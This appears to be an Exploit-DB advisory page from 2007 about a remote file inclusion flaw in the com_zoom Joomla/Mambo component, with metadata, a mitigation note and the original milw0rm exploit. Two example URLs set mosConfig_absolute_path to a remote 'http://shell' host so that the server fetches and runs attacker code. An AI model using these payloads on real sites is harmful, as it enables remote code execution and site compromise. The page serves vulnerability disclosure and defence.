com_zoom file include

vendor:

by:

iskorpitx

5.5

CVSS

MEDIUM

File Inclusion

CWE

Product Name:

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

The code includes a file from a user-controlled path without proper sanitization, which can be exploited to include arbitrary files from the server or remote locations.

Mitigation:

To mitigate this vulnerability, input validation and sanitization should be performed on the user-controlled path before including any files.

Source

Exploit-DB raw data:

iskorpitx@metlak
from TURKEY
com_zoom file include



******************************************************************************/

// Create the Makernote Parser and Interpreter Function Array

$GLOBALS['Makernote_Function_Array'] = array(   "Read_Makernote_Tag" => array( ),
                                                "get_Makernote_Text_Value" => array( ),
                                                "Interpret_Makernote_to_HTML" => array( ) );


// Include the Main TIFF and EXIF Tags array

include_once("$mosConfig_absolute_path/components/com_zoom/classes/iptc/EXIF.php");

/******************************************************************************

http://www.example.com/[path]/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://shell*
http://www.example.com/[path]/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://shell*

iskorpitx

admin@siyamiozkan-mavideniz.org

# milw0rm.com [2007-04-11]